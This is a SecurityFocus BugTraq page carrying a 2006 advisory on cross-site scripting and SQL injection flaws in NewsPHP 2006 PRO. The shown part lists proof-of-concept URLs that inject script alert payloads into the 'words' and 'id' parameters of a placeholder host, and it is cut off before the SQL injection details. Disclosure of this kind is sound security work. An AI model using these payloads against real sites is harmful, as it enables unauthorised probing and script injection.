Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs
BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
NewsPHP 2006 PRO XSS SQL injection Vulnerability Jun 29 2006 10:46AM
securityconnection gmail com
http://newsphp.com

------------------

Cross Site Scripting (XSS)

------------------

http://target.xx/?words=%3Cscript%3Ealert(/Ellipsis%20Security%20Test/)%
3C/script%3E&where=1

http://target.xx/index.php?id=%3Cscript%3Ealert(%22Ellipsis%20Security%2
0Test%22)%3C/script%3E

http://target.xx/index...

[ more ]  





 

Privacy Statement
Copyright 2009, SecurityFocus